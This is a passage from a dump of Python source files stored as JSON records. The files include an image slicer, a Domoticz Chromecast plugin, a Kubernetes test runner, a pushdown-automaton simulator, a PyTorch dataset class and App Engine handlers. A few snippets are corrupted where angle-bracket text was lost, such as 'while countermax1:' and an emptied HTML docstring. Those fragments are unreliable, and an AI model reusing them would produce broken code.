str(tif_image_list[x])\r\n\r\n tempstr = str(tif_image_list[x])\r\n tempstr = tempstr.replace('tif', 'jpeg')\r\n jpeg_img_directory = jpeg_img_directory + '\\\\' + tempstr\r\n\r\n slice_name = str(tif_image_list[x])\r\n slice_name = slice_name.replace('.tif', '_slice')\r\n\r\n convert_tif_to_jpeg(tif_img_directory, jpeg_img_directory)\r\n slice_jpeg(jpeg_img_directory, num_slices,\r\n jpeg_slices_directory, slice_name)\r\n\r\n return\r\n\r\n\r\n# Creates a list of all the image file names in morpho_training folder\r\ntif_image_list = os.listdir(\r\n r'G:\\PyScripts\\morpho_training\\test_images\\original')\r\n\r\nprint(\"All images in folder: \", tif_image_list)\r\n\r\n# Variables\r\nnum_slices = 16 # 408x352 pixels, image_slicer automatically slices to possible number so odd number slices and unsliceable numbers get adjusted\r\n# The r makes it a raw string otherwise you need to use double backslashes\r\ntif_img_directory = r'G:\\PyScripts\\morpho_training\\test_images\\original'\r\njpeg_img_directory = r'G:\\PyScripts\\morpho_training\\test_images\\test_jpg'\r\njpeg_slices_directory = r'G:\\PyScripts\\morpho_training\\test_images\\test_slices'\r\n\r\nconvert_tif_to_jpeg_slices(tif_image_list, tif_img_directory,\r\n jpeg_img_directory, jpeg_slices_directory, num_slices)\r\n","sub_path":"tif_image_slicer.py","file_name":"tif_image_slicer.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"352103926","text":"#\n# Author: Tsjippy\n#\n\"\"\"\n\n \n

Chromecast


\n This plugin add devices to Domoticz to control your chromecast, and to retrieve its current app, title, playing mode.

\n

Features

\n
    \n
  • Pause, Play or stop the app on the chromecast
  • \n
  • See current connected app, title and playing mode.
  • \n
\n

Devices

\n
    \n
  • Switch device - Playing mode
  • \n
  • Switch device - Connected app
  • \n
  • Volume device - See or adjust the current volume
  • \n
  • Text device - See current title
  • \n
\n

Configuration

\n Just add your chromecast name\n
\n \n \n \n \n \n \n \n
\n\"\"\"\n#############################################################################\n# Imports #\n#############################################################################\nimport sys\nimport threading\n\ntry:\n import Domoticz\n debug = False\nexcept ImportError:\n import fakeDomoticz as Domoticz\n debug = True\n\nimport pychromecast\nfrom pychromecast.controllers.youtube import YouTubeController\n\n#############################################################################\n# Domoticz call back functions #\n#############################################################################\nclass StatusListener:\n def __init__(self, name, cast):\n self.name = name\n self.cast = cast\n self.Appname=\"\"\n self.Volume=0\n\n def new_cast_status(self, status):\n if self.Appname != status.display_name:\n self.Appname = status.display_name\n Domoticz.Log(\"The app changed to \"+status.display_name)\n UpdateDevice(4,0,str(self.Appname))\n\n if self.Volume != status.volume_level:\n self.Volume = status.volume_level\n Volume = int(self.Volume*100)\n Domoticz.Log(\"Updated volume to \"+str(Volume))\n UpdateDevice(2,Volume,str(Volume))\n\n\nclass StatusMediaListener:\n def __init__(self, name, cast):\n self.name = name\n self.cast= cast\n self.Mode=\"\"\n self.Title=\"\"\n\n def new_media_status(self, status):\n #Domoticz.Log(\"Mediastatus \"+str(status))\n if self.Mode != status.player_state:\n self.Mode = status.player_state\n\n if(self.Mode) == \"PLAYING\":\n self.Mode=\"Play\"\n elif(self.Mode) == \"PAUSED\":\n self.Mode=\"Pause\"\n elif(self.Mode) == \"STOPPED\":\n self.Mode=\"Stop\"\n\n Domoticz.Log(\"The playing mode has changed to \"+self.Mode)\n UpdateDevice(1,0,self.Mode)\n if self.Title != status.title:\n self.Title = status.title\n Domoticz.Log(\"The title is changed to \"+self.Title)\n UpdateDevice(3,0,self.Title)\n\nclass BasePlugin:\n enabled = False\n def __init__(self):\n #self.var = 123\n return\n\n def onStart(self):\n # Check if images are in database\n Domoticz.Status(\"Checking if images are loaded\")\n if 'ChromecastLogo' not in Images: Domoticz.Image('ChromecastLogo.zip').Create()\n\n # Check if devices need to be created\n createDevices()\n\n if Parameters[\"Mode6\"]==\"Debug\":\n DumpConfigToLog()\n\n Domoticz.Heartbeat(30)\n\n Domoticz.Status(\"Starting up\")\n\n self.chromecast=ConnectChromeCast()\n\n if self.chromecast != \"\":\n Domoticz.Status(\"Registering listeners\")\n\n thread = Thread(target = startListening, args = (self.chromecast, ))\n thread.start()\n\n return True\n\n def onHeartbeat(self):\n if self.chromecast == \"\":\n self.chromecast=ConnectChromeCast()\n\n def onCommand(self, Unit, Command, Level, Hue):\n Domoticz.Log(\"onCommand called for Unit \" + str(Unit) + \": Parameter '\" + str(Command) + \"', Level: \" + str(Level))\n if self.chromecast == \"\":\n Domoticz.Error(\"No chromecast is connected!\")\n else:\n if Unit == 1:\n if Level == 10:\n Domoticz.Log(\"Start playing on chromecast\")\n self.chromecast.media_controller.play()\n elif Level == 20:\n Domoticz.Log(\"Pausing chromecast\")\n self.chromecast.media_controller.pause()\n elif Level == 30:\n Domoticz.Log(\"Killing \"+self.chromecast.app_display_name)\n self.chromecast.quit_app()\n elif Unit == 2:\n vl = float(Level)/100\n self.chromecast.set_volume(vl)\n elif Unit == 4:\n if Level == 30:\n Domoticz.Log(\"Starting Youtube on chromecast\")\n yt = YouTubeController()\n self.chromecast.register_handler(yt)\n\nglobal _plugin\n_plugin = BasePlugin()\n\ndef onStart():\n global _plugin\n _plugin.onStart()\n\ndef onHeartbeat():\n global _plugin\n _plugin.onHeartbeat()\n\ndef onCommand(Unit, Command, Level, Hue):\n global _plugin\n _plugin.onCommand(Unit, Command, Level, Hue)\n\n # Generic helper functions\ndef DumpConfigToLog():\n for x in Parameters:\n if Parameters[x] != \"\":\n Domoticz.Debug( \"'\" + x + \"':'\" + str(Parameters[x]) + \"'\")\n Domoticz.Debug(\"Device count: \" + str(len(Devices)))\n for x in Devices:\n Domoticz.Debug(\"Device: \" + str(x) + \" - \" + str(Devices[x]))\n Domoticz.Debug(\"Device ID: '\" + str(Devices[x].ID) + \"'\")\n Domoticz.Debug(\"Device Name: '\" + Devices[x].Name + \"'\")\n Domoticz.Debug(\"Device nValue: \" + str(Devices[x].nValue))\n Domoticz.Debug(\"Device sValue: '\" + Devices[x].sValue + \"'\")\n Domoticz.Debug(\"Device LastLevel: \" + str(Devices[x].LastLevel))\n return\n\n#############################################################################\n# Device specific functions #\n#############################################################################\n\ndef senderror(e):\n Domoticz.Error('Error on line {}'.format(sys.exc_info()[-1].tb_lineno)+\" Error is \"+str(e))\n return\n\ndef createDevices():\n if 1 not in Devices:\n OPTIONS1 = { \"LevelActions\" : \"|||||\",\n \"LevelNames\" : \"Off|Play|Pause|Stop\",\n \"LevelOffHidden\": \"true\",\n \"SelectorStyle\" : \"0\"\n }\n Domoticz.Log(\"Created 'Status' device\")\n Domoticz.Device(Name=\"Control\", Unit=1, TypeName=\"Selector Switch\", Switchtype=18, Options=OPTIONS1, Used=1).Create()\n UpdateImage(1, 'ChromecastLogo')\n\n if 2 not in Devices:\n Domoticz.Log(\"Created 'Volume' device\")\n Domoticz.Device(Name=\"Volume\", Unit=2, Type=244, Subtype=73, Switchtype=7, Used=1).Create()\n UpdateImage(2, 'ChromecastLogo')\n\n if 3 not in Devices:\n Domoticz.Log(\"Created 'Title' device\")\n Domoticz.Device(Name=\"Title\", Unit=3, Type=243, Subtype=19, Used=1).Create()\n UpdateImage(3, 'ChromecastLogo')\n\n if 4 not in Devices:\n OPTIONS4 = { \"LevelActions\" : \"|||||\",\n \"LevelNames\" : \"Off|Spotify|Netflix|Youtube|Other\",\n \"LevelOffHidden\": \"true\",\n \"SelectorStyle\" : \"0\"\n }\n Domoticz.Log(\"Created 'App' device\")\n Domoticz.Device(Name=\"App name\", Unit=4, TypeName=\"Selector Switch\", Switchtype=18, Options=OPTIONS4, Used=1).Create()\n UpdateImage(4, 'ChromecastLogo')\n\n Domoticz.Log(\"Devices check done\")\n return\n\n# Synchronise images to match parameter in hardware page\ndef UpdateImage(Unit, Logo):\n if Unit in Devices and Logo in Images:\n if Devices[Unit].Image != Images[Logo].ID:\n Domoticz.Log(\"Device Image update: 'Chromecast', Currently \" + str(Devices[Unit].Image) + \", should be \" + str(Images[Logo].ID))\n Devices[Unit].Update(nValue=Devices[Unit].nValue, sValue=str(Devices[Unit].sValue), Image=Images[Logo].ID)\n return\n\ndef ConnectChromeCast():\n chromecast = \"\"\n try:\n ChromecastName = Parameters[\"Mode1\"]\n except:\n ChromecastName=\"Test Device\"\n\n Domoticz.Status(\"Checking for available chromecasts\")\n try:\n chromecasts = pychromecast.get_chromecasts()\n if len(chromecasts) != 0:\n Domoticz.Log(\"Found these chromecasts: \"+str(chromecasts))\n else:\n Domoticz.Status(\"No casting devices found, make sure they are online.\")\n except Exception as e:\n senderror(e)\n\n if len(chromecasts) != 0:\n Domoticz.Status(\"Trying to connect to \"+ChromecastName)\n try:\n chromecast = next(cc for cc in chromecasts if cc.device.friendly_name == ChromecastName)\n Domoticz.Status(\"Connected to \" + ChromecastName)\n except StopIteration:\n Domoticz.Error(\"Could not connect to \"+ChromecastName)\n except Exception as e:\n senderror(e)\n\n return chromecast\n\ndef startListening(chromecast):\n Domoticz.Log(\"Registering listeners\")\n listenerCast = StatusListener(chromecast.name, chromecast)\n chromecast.register_status_listener(listenerCast)\n\n listenerMedia = StatusMediaListener(chromecast.name, chromecast)\n chromecast.media_controller.register_status_listener(listenerMedia)\n\n Domoticz.Log(\"Done registering listeners\")\n\n# Update Device into database\ndef UpdateDevice(Unit, nValue, sValue, AlwaysUpdate=False):\n # Make sure that the Domoticz device still exists (they can be deleted) before updating it\n if Unit in Devices:\n if Devices[Unit].nValue != nValue or Devices[Unit].sValue != sValue or AlwaysUpdate == True:\n Devices[Unit].Update(nValue, str(sValue))\n Domoticz.Log(\"Update \" + Devices[Unit].Name + \": \" + str(nValue) + \" - '\" + str(sValue) + \"'\")\n return\n\nif debug==True:\n ConnectChromeCast()\n\n\n\n\n","sub_path":"plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":10819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"507758576","text":"def max_number(list1):\n counter=0\n max1=list1[0]\n while countermax1:\n max1=list1[counter]\n counter=counter+1\n return max1\ndef two_list(list1,list2):\n value=list1+list2\n call_function=max_number(value)\n return (call_function)\ndef odd_even(list):\n list=[1,2,3,4,5,6,7,8,9,10,12,13,14,15,16,17,18,19,99,234,20]\n list1=[]\n list2=[]\n index=0\n while index 1:\n output_directory = os.path.join(output_directory, library)\n os.makedirs(output_directory)\n package_init = os.path.join(output_directory, \"__init__.py\")\n # Touch the __init__ file.\n with open(package_init, 'a'):\n pass\n\n if len(package_files) > 1:\n for fn in package_files:\n base_dir = os.path.join(output_directory, os.path.dirname(fn))\n if not os.path.isdir(base_dir):\n os.makedirs(base_dir)\n total_size += 512\n\n\n new_extension = \".py\"\n if mpy_cross:\n new_extension = \".mpy\"\n\n for filename in py_files:\n full_path = os.path.join(library_path, filename)\n output_file = os.path.join(output_directory,\n filename.replace(\".py\", new_extension))\n if mpy_cross:\n\n mpy_success = subprocess.call([mpy_cross,\n \"-o\", output_file,\n \"-s\", filename,\n full_path])\n if mpy_success != 0:\n raise RuntimeError(\"mpy-cross failed on\", full_path)\n else:\n shutil.copyfile(full_path, output_file)\n\n for filename in package_files:\n full_path = os.path.join(library_path, filename)\n if (not mpy_cross or\n os.stat(full_path).st_size == 0 or\n filename.endswith(\"__init__.py\")):\n output_file = os.path.join(output_directory, filename)\n shutil.copyfile(full_path, output_file)\n else:\n output_file = os.path.join(output_directory,\n filename.replace(\".py\", new_extension))\n mpy_success = subprocess.call([mpy_cross,\n \"-o\", output_file,\n \"-s\", filename,\n full_path])\n if mpy_success != 0:\n raise RuntimeError(\"mpy-cross failed on\", full_path)\n","sub_path":"circuitpython_build_tools/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":5043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"596603947","text":"from ApiADA.loggers import logging\nfrom core.exceptions.customexceptions import ApiException\nimport traceback\nimport json\nfrom core.vodafone.smart.contract.models import Contract\nfrom django.conf import settings\nfrom core.vodafone.smart import smart_query\n\n\nlog = logging.getLogger(__name__)\n\nclass AveriasManagement:\n\n def AddComment(params):\n\n log.info('Start: AddComment')\n\n if not \"s_id_averia\" in params:\n raise ApiException(\"Invalid params. s_id_averia required.\")\n if not \"s_user\" in params:\n raise ApiException(\"Invalid params. s_user required.\")\n\n try:\n \n paramsProc=[\n {\n \"name\": \"id_averia\",\n \"inout\": \"IN\",\n \"type\": \"String\",\n \"value\": params[\"s_id_averia\"]\n },\n {\n \"name\": \"usuario\",\n \"inout\": \"IN\",\n \"type\": \"String\",\n \"value\": params[\"s_user\"]\n },\n {\n \"name\": \"comentario\",\n \"inout\": \"IN\",\n \"type\": \"String\",\n \"value\": params[\"s_comentario\"]\n },\n {\n \"name\": \"id_incidencia\",\n \"inout\": \"IN\",\n \"type\": \"String\",\n \"value\": params[\"s_id_incidencia\"]\n },\n {\n \"name\": \"resultado\",\n \"inout\": \"OUT\",\n \"type\": \"String\"\n },\n {\n \"name\": \"res_desc\",\n \"inout\": \"OUT\",\n \"type\": \"String\"\n }\n ] \n\n output=smart_query.execProcedure(\"smart_replica\", \"SA.PKG_GESTION_AVERIAS_ADA.PRC_ADD_COMENTARIO_AVERIA\", paramsProc)\n\n except Exception as e:\n log.error('Exception:'+type(e).__name__ +\" \" +str(e))\n log.error(traceback.format_exc())\n raise ApiException(str(e))\n\n log.info('End: AddComment')\n\n return output\n\n\n def MoveAveria(params):\n\n log.info('Start: MoveAveria')\n\n if not \"s_id_averia\" in params:\n raise ApiException(\"Invalid params. s_id_averia required.\")\n if not \"s_queue\" in params:\n raise ApiException(\"Invalid params. s_queue required.\")\n\n try:\n \n paramsProc=[\n {\n \"name\": \"id_averia\",\n \"inout\": \"IN\",\n \"type\": \"String\",\n \"value\": params[\"s_id_averia\"]\n },\n {\n \"name\": \"cola_destino\",\n \"inout\": \"IN\",\n \"type\": \"Number\",\n \"value\": params[\"s_queue\"]\n },\n {\n \"name\": \"resultado\",\n \"inout\": \"OUT\",\n \"type\": \"String\"\n },\n {\n \"name\": \"res_desc\",\n \"inout\": \"OUT\",\n \"type\": \"String\"\n }\n ] \n\n output=smart_query.execProcedure(\"smart_replica\", \"SA.PKG_GESTION_AVERIAS_ADA.PRC_MOVER_AVERIA_A_NUEVA_COLA\", paramsProc)\n\n except Exception as e:\n log.error('Exception:'+type(e).__name__ +\" \" +str(e))\n log.error(traceback.format_exc())\n raise ApiException(str(e))\n\n log.info('End: MoveAveria')\n\n return output\n\n\n def CloseAveria(params):\n\n log.info('Start: CloseAveria')\n\n if not \"s_id_averia\" in params:\n raise ApiException(\"Invalid params. s_id_averia required.\")\n if not \"s_notes\" in params:\n raise ApiException(\"Invalid params. s_notes required.\")\n\n try:\n \n paramsProc=[\n {\n \"name\": \"id_averia\",\n \"inout\": \"IN\",\n \"type\": \"String\",\n \"value\": params[\"s_id_averia\"]\n },\n {\n \"name\": \"strnotas\",\n \"inout\": \"IN\",\n \"type\": \"String\",\n \"value\": params[\"s_notes\"]\n },\n {\n \"name\": \"resultado\",\n \"inout\": \"OUT\",\n \"type\": \"String\"\n },\n {\n \"name\": \"res_desc\",\n \"inout\": \"OUT\",\n \"type\": \"String\"\n }\n ] \n\n output=smart_query.execProcedure(\"smart_replica\", \"SA.PKG_GESTION_AVERIAS_ADA.PRC_CERRAR_AVERIA\", paramsProc)\n\n except Exception as e:\n log.error('Exception:'+type(e).__name__ +\" \" +str(e))\n log.error(traceback.format_exc())\n raise ApiException(str(e))\n\n log.info('End: CloseAveria')\n\n return output","sub_path":"core/beans/averias_management/averias_management.py","file_name":"averias_management.py","file_ext":"py","file_size_in_byte":5139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"276282783","text":"import yaml\nimport os, sys, subprocess\nimport time, random, string\nfrom kubernetes import client, config\n\nMPATH = \"manifests\"\nCFILE = \"test.yaml\"\n\napi = None\n\ndef rand_str(length=5):\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(length))\n\ndef loop(step):\n for i in range(step[\"Count\"]):\n print(\"iteration\", str(i))\n run_test(step)\n print(\"end of iteration\")\n\ndef deploy_manifest(step):\n manifest = step[\"Manifest\"]\n ns = step[\"Namespace\"]\n\n path = os.path.join(MPATH, manifest)\n\n if \"ManifestName\" in step:\n o = yaml.safe_load(open(path, \"r\"))\n o[\"metadata\"][\"name\"] = \"test-\" + rand_str() \\\n if step[\"ManifestName\"] == \"Generate\" else step[\"ManifestName\"]\n\n path = \"/tmp/test\" + o[\"metadata\"][\"name\"] \n\n with open(path, \"w+\") as f:\n yaml.safe_dump(o, f)\n\n e = subprocess.run([\"kubectl\", \"apply\", \"-n\", ns, \"-f\", path],\n stdout=subprocess.DEVNULL)\n \n if e.returncode != 0:\n print(\"Error applying manifest\")\n sys.exit(1)\n\ndef delete(step):\n ns = step['Namespace']\n\n e = subprocess.run([\"kubectl\", \"delete\", \"ns\", ns])\n \n if e.returncode != 0:\n print(\"Error scaling deployment\")\n sys.exit(1)\n\n\ndef scale_deployment(step):\n ns = step['Namespace']\n nm = step['DeploymentName']\n rp = step['Replicas']\n\n e = subprocess.run([\"kubectl\", \"scale\", \"deployment\", nm, \n \"--replicas=\" + str(rp), \"-n\", ns])\n \n if e.returncode != 0:\n print(\"Error scaling deployment\")\n sys.exit(1)\n\ndef wait_for_all_deployments_completion(step):\n ns = \"default\"\n if \"Namespace\" in step:\n ns = step[\"Namespace\"]\n \n while True:\n r = api.list_namespaced_deployment(namespace=ns, watch=False)\n \n count = 0\n for d in r.items:\n ready = d.status.ready_replicas\n replicas = d.status.replicas\n\n if ready == replicas:\n count = count + 1\n \n if count == len(r.items):\n return\n\n print(\"Waiting for all deployments to become ready %d/%d ...\" % \n (count, len(r.items)))\n time.sleep(1)\n\ndef parse_config():\n with open(CFILE, \"r\") as f:\n o = yaml.load(f)\n return o\n\n\nswitch = {\n \"Loop\": loop,\n \"Deploy\": deploy_manifest,\n \"ScaleDeployment\": scale_deployment,\n \"WaitForAllDeploymentsCompletion\": wait_for_all_deployments_completion\n }\n\n\ndef run_test(test):\n for step in test[\"Steps\"]:\n func = switch[step[\"Name\"]]\n print(\"Running\", step['Name'])\n func(step)\n\ndef main():\n config.load_kube_config()\n global api\n api = client.AppsV1Api()\n\n test = parse_config()\n run_test(test)\n\nmain()\n","sub_path":"trun/trun.py","file_name":"trun.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"30545777","text":"#!/bin/python3\n\nimport sys\nimport copy\n\ndef winningHands(m, x, a):\n best_so_far = [0] * (m + 5)\n current = [0] * (m + 5)\n for card in a:\n # loop invariant: current[j] is the number of ways that \n # some product of numbers (processed beforehand) mod m = j \n # for all cards until and including the current card\n for j in range(len(current)):\n # we increment the number of ways in which we can reach j * card\n # with the number of ways we already reached j\n current[(j * card) % m] += best_so_far[j]\n # the current card alone accounts for 1 way to reach card % m\n current[card % m] += 1\n # update the best results thus far\n best_so_far = copy.copy(current)\n # return the highest number of ways to reach x\n return best_so_far[x]\n\n \n\nif __name__ == \"__main__\":\n n, m, x = input().strip().split(' ')\n n, m, x = [int(n), int(m), int(x)]\n a = list(map(int, input().strip().split(' ')))\n a = [a[i] for i in range(n)]\n result = winningHands(m, x, a)\n print(result)\n\n","sub_path":"hackerrank/rookierank4/WinningHands.py","file_name":"WinningHands.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"414377214","text":"import re, sys\n\ndef readFile():\n\tfile = open(sys.argv[1], \"r\")\n\tautomato = []\n\n\tfor line in file:\n\t\tautomato.append(line)\n\n\tfile.close()\n\n\treturn automato\n\ndef clearFirstLine(automato):\n\tfirstLine = automato[0]\n\tregex = re.compile(r'\\{[^\\}]*\\}')\n\tdata = re.findall(regex, firstLine)\n\tresult = []\n\n\tfor element in data:\n\t\tresult.append(element.strip(\"{}\").replace(\" \", \"\").split(\",\"))\n\n\treturn result\n\ndef searchInitialState(automato):\n\tfirstLine = automato[0]\n\tregex = re.compile(r\"Z|,\\sq\\w*,\\s{\")\n\tdata = re.findall(regex, firstLine)\n\tinitialState = [element.strip(\",{ \") for element in data]\n\n\treturn initialState\n\ndef readTransictionRules(automato):\n\trules = []\n\n\tfor i in range(1, len(automato)):\n\t\tautomato[i] = automato[i].strip(\"\\n\").replace(\" \", \"\").split(\",\")\n\t\trules.append(automato[i])\n\n\treturn rules\n\ndef printing(state, letter, rStack, nextState, wStack, stack):\n\tif wStack != \"_\":\n\t\tif len(wStack)>1:\n\t\t\tfor c in wStack:\n\t\t\t\tstack.append(c)\n\t\telse:\n\t\t\tstack.append(wStack)\n\t\t\t\n\tprint(\"(\" + state + \", \" + letter +\", \"+ rStack + \") = (\"+ nextState +\", \"+ wStack+ \") - Pilha = {}\".format(stack))\n\n\treturn (True, nextState)\n\n\ndef test(stack, rStack, letter):\n\tif (len(stack) == 0) and (rStack == \"?\") and (letter == \" \"):\n\t\treturn True\n\treturn False\n\ndef readingOfWord(initialState, finalStates, rules, auxPilha):\n\tword = sys.argv[2]\n\tword += \" \"\n\tactualState = initialState[0]\n\tstack = []\n\n\t\n\tfor letter in word:\n\t\tvalidation = False\n\n\t\tfor rule in rules:\n\t\t\tstate, symbol, rStack, nextState, wStack = rule\n\t\t\tif (state == actualState) and ((symbol == letter) or (symbol == \"?\")):\t\t\t\t\n\t\t\t\t#print(regra)\n\t\t\t\tif test(stack, rStack, letter):\n\t\t\t\t\tvalidation, actualState = printing(state, letter, rStack, nextState, wStack, stack)\n\t\t\t\t\tbreak\n\n\t\t\t\telif rStack == \"_\":\n\t\t\t\t\tvalidation, actualState = printing(state, letter, rStack, nextState, wStack, stack)\n\t\t\t\t\tbreak\n\n\t\t\t\telif (len(stack) > 0) and (rStack == stack[-1]):\n\t\t\t\t\tstack.pop()\n\t\t\t\t\tvalidation, actualState = printing(state, letter, rStack, nextState, wStack, stack)\n\t\t\t\t\tbreak\n\n\t\tif not validation:\n\t\t\treturn False\n\n\tif actualState in finalStates:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\ndef main():\n\tautomato = readFile()\n\tdata = clearFirstLine(automato)\n\tinitialState = searchInitialState(automato)\n\trules = readTransictionRules(automato)\n\talphabet = data[0]\n\tstates = data[1]\n\tfinalStates = data[2]\n\tauxPilha = data[3]\n\n\tprint(\"\\n-> Alfabeto: {}\".format(alphabet))\n\tprint(\"-> Estados: {}\".format(states))\n\tprint(\"-> Estado Inicial: {}\".format(initialState))\n\tprint(\"-> Estado Final: {}\".format(finalStates))\n\tprint(\"-> Alfabeto Pilha : {}\".format(auxPilha))\n\tprint(\"-> Regras de Transição: \")\n\n\tfor rule in rules:\n\t\tprint(rule)\n\tprint()\n\n\tprint(\"Processamento: \"+ sys.argv[2])\n\t\n\tvalidation = readingOfWord(initialState, finalStates, rules, auxPilha)\n\n\tif validation == True:\n\t\treturn (\"\\nPalavra Valida\")\n\telse:\n\t\treturn (\"\\nPalavra Invalida\")\n\n\nif len(sys.argv) != 3:\n\tprint(\"Você precisa informar um arquivo e uma palavra para ser processada\")\nelse:\n\tprint(main())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"511297190","text":"# Copyright [yyyy] [name of copyright owner]\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport torch.utils.data as data\nimport os\nfrom PIL import Image\nimport numpy as np\nimport pickle\nimport copy\n\nclass AttDataset(data.Dataset):\n \"\"\"\n person attribute dataset interface\n \"\"\"\n def __init__(\n self, \n dataset,\n partition,\n split='train',\n partition_idx=0,\n transform=None,\n target_transform=None,\n **kwargs):\n if os.path.exists( dataset ):\n file = open(dataset, 'rb')\n self.dataset = pickle.load(file)\n else:\n print (dataset + ' does not exist in dataset.')\n raise ValueError\n if os.path.exists( partition ):\n part = open(partition, 'rb')\n self.partition = pickle.load(part)\n else:\n print (partition + ' does not exist in dataset.')\n raise ValueError\n if split not in self.partition:\n print (split + ' does not exist in dataset.')\n raise ValueError\n \n if partition_idx > len(self.partition[split])-1:\n print ('partition_idx is out of range in partition.')\n raise ValueError\n\n self.transform = transform\n self.target_transform = target_transform\n\n # create image, label based on the selected partition and dataset split\n self.root_path = self.dataset['root']\n self.att_name = [self.dataset['att_name'][i] for i in self.dataset['selected_attribute']]\n self.image = []\n self.label = []\n for idx in self.partition[split][partition_idx]:\n self.image.append(self.dataset['image'][idx])\n label_tmp = np.array(self.dataset['att'][idx])[self.dataset['selected_attribute']].tolist()\n self.label.append(label_tmp)\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: (image, target) where target is the index of the target class\n \"\"\"\n imgname, target = self.image[index], self.label[index]\n # load image and labels\n imgname = os.path.join(self.dataset['root'], imgname)\n img = Image.open(imgname)\n if self.transform is not None:\n img = self.transform( img )\n \n # default no transform\n target = np.array(target).astype(np.float32)\n target[target == 0] = -1\n target[target == 2] = 0\n if self.target_transform is not None:\n target = self.transform( target )\n\n return img, target\n\n # useless for personal batch sampler\n def __len__(self):\n return len(self.image)\n\n\n","sub_path":"PyTorch/built-in/cv/classification/DeepMar_for_PyTorch/baseline/dataset/Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"146602260","text":"import cgi\nimport os\nfrom django.utils import simplejson as json\nimport oauth\nimport hashlib\n\nfrom collections import deque\n\nimport re\nimport datetime\n\nimport logging\n\nimport gmemsess\n\nfrom google.appengine.api import urlfetch\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import util\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom google.appengine.ext import db\n#from google.appengine.ext.db import stats\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.api import memcache\nfrom google.appengine.api import images\nfrom google.appengine.api import quota\n\nimport cStringIO\nimport csv\n\nfrom datastore import *\nimport helper\nimport phone\n\n# number of observations shown per page\nPAGE_SIZE = 20\n\n# map page: /map\nclass MapPage(webapp.RequestHandler):\n\tdef get(self):\n\t\tif os.environ.get('HTTP_HOST'):\n\t\t\tbase_url = 'http://' + os.environ['HTTP_HOST'] + '/'\n\t\telse:\n\t\t\tbase_url = 'http://' + os.environ['SERVER_NAME'] + '/'\n\n\t\textracted = memcache.get('saved')\n\n\t\tif not extracted:\n\t\t\tsurveys = SurveyData.all().order('-timestamp').fetch(PAGE_SIZE*5+1)\n\t\t\textracted = helper.extract_surveys (surveys)\n\t\t\tif surveys is not None:\n\t\t\t\t#memcache.set('saved', extracted, 604800)\n\t\t\t\tmemcache.set('saved', extracted)\n\t\ttemplate_values = { 'surveys' : extracted, 'base_url' : base_url }\n\t\ttemplate_values['map'] = True\n\t\tpath = os.path.join (os.path.dirname(__file__), 'views/map.html')\n\t\tself.response.out.write (helper.render(self, path, template_values))\n\t# end get method\n# End MapPage Class\n\n# handler for: /get_point_summary\nclass GetPointSummary(webapp.RequestHandler):\n\t# returns json string of all survey data\n\t# TODO: this needs to be changed to return only a subset of the surveys, add paging\n\tdef get(self):\n\t\t#surveys = db.GqlQuery(\"SELECT * FROM SurveyData ORDER BY timestamp DESC LIMIT 50\")\n\n\t\t# this should be changed to just use the same extracted format everything else uses...\n\t\td = memcache.get('pointsummary')\n\n\t\ti = 0\n\t\tif not d:\n\t\t\tsurveys = SurveyData.all().order('-timestamp').fetch(50)\n\t\t\td = {}\n\t\t\tfor s in surveys:\n\t\t\t\te = {}\n\t\t\t\te['latitude'] = s.latitude\n\t\t\t\te['longitude'] = s.longitude\n\t\t\t\te['stressval'] = s.stressval\n\t\t\t\te['comments'] = s.comments\n\t\t\t\te['key'] = str(s.key())\n\t\t\t\te['version'] = s.version\n\t\t\t\tif s.hasphoto:\n\t\t\t\t\te['photo_key'] = str(s.photo_ref.key())\n\t\t\t\telse:\n\t\t\t\t\te['photo_key'] = None\n\n\t\t\t\td[i] = e\n\t\t\t\ti = i + 1\n\n\t\t\tif i > 0:\n\t\t\t\t#memcache.set('pointsummary', d, 604800)\n\t\t\t\tmemcache.set('pointsummary', d)\n\t\telse:\n\t\t\ti = len(d)\n\n\t\tself.response.headers['Content-type'] = 'text/plain'\n\t\tif i > 0 :\n\t\t\tself.response.out.write(json.dumps(d))\n\t\telse:\n\t\t\tself.response.out.write(\"no data so far\")\n\t# end get method\n# End GetPointSummary Class\n\n# handler for: /get_a_point\nclass GetAPoint(webapp.RequestHandler):\n\t# input: key - datastore key from SurveyData \n\t# returns survey data associated with given key as json string\n\tdef get(self):\n\t\tif os.environ.get('HTTP_HOST'):\n\t\t\tbase_url = os.environ['HTTP_HOST']\n\t\telse:\n\t\t\tbase_url = os.environ['SERVER_NAME']\n\n\n\t\tself.response.headers['Content-type'] = 'text/plain'\n\t\treq_key = self.request.get('key')\n\t\tif req_key != '':\n\t\t\ttry :\n\t\t\t\tdb_key = db.Key(req_key)\n\t\t\t\ts = db.GqlQuery(\"SELECT 